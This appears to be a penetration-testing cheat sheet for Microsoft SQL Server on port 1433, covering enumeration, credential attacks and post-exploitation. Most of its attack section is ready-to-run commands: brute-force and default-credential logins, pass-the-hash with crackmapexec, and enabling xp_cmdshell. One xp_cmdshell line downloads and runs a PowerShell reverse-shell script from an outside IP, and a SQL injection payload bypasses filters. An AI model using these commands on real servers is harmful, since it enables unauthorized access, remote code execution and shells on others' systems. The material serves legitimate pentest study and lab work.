1433 MSSQL

---

Notes

---

Alternative Ports
1433 TCP (default MSSQL)
1434 UDP (SQL Server Browser)

Service Description
Microsoft SQL Server listens on TCP/1433 for client connections. It supports SQL queries, user authentication (via Windows or SQL auth), and administrative functions. UDP/1434 is used for SQL Server Browser service discovery.

SQL Auth Exposure

MSSQL often exposes SQL authentication in addition to Windows auth. Weak or default creds are a frequent misconfig.

---

Attacks

---

Weak Credentials / SQL Auth
SQL authentication is commonly enabled and can be bruteforced if not rate-limited.

xp_cmdshell Abuse
If enabled, attackers can execute system commands as the database user.

Linked Server Pivoting
Chained trust relationships may allow lateral movement between MSSQL hosts.

---

Tools & Exploits

---

Enumeration

---

nmap

nmap -p1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-config,ms-sql-dump-hashes <target>

Metasploit

use auxiliary/scanner/mssql/mssql_ping
use auxiliary/admin/mssql/mssql_enum
use auxiliary/scanner/mssql/mssql_login

crackmapexec

cme mssql <target> -u sa -p 'password123' --check
cme mssql <target> -u <user> -p <pass> -q "SELECT name FROM master.dbo.sysdatabases;"
cme mssql -d <domain> -u <user> -p <pass> -x "whoami"
cme mssql -d <domain> -u <user> -H <hash> -X '$PSVersionTable'

sqsh / tsql / mssql-cli

sqsh -U sa -P password -S <target>
> EXEC master..xp_cmdshell 'whoami'
> go

impacket-mssqlclient

mssqlclient.py DOMAIN/user:'Password123'@<target>
# Windows auth
impacket-mssqlclient -port <port> domain/username:password@target -windows-auth

---

Exploitation or Post-Enum

---

Enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Test/Abuse xp_cmdshell

EXEC master..xp_cmdshell 'whoami'
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

Bypass Filters

'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping <collab-url>' --

Check if Enabled

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

Extract Information

SELECT @@version;
SELECT DB_NAME();
SELECT name FROM master..sysdatabases;
SELECT is_srvrolemember('sysadmin');
EXEC sp_linkedservers;

---

Wireshark Analysis Tips

---

Filters

tcp.port == 1433

What to look for:

• Login attempts and auth responses
• SQL queries or table data in plain text (unencrypted setups)
• NTLM handshake over TDS

---

References

---

• https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
• https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
• https://nmap.org/nsedoc/scripts/ms-sql-info.html
• https://github.com/SecureAuthCorp/impacket
• https://sqliteonline.com/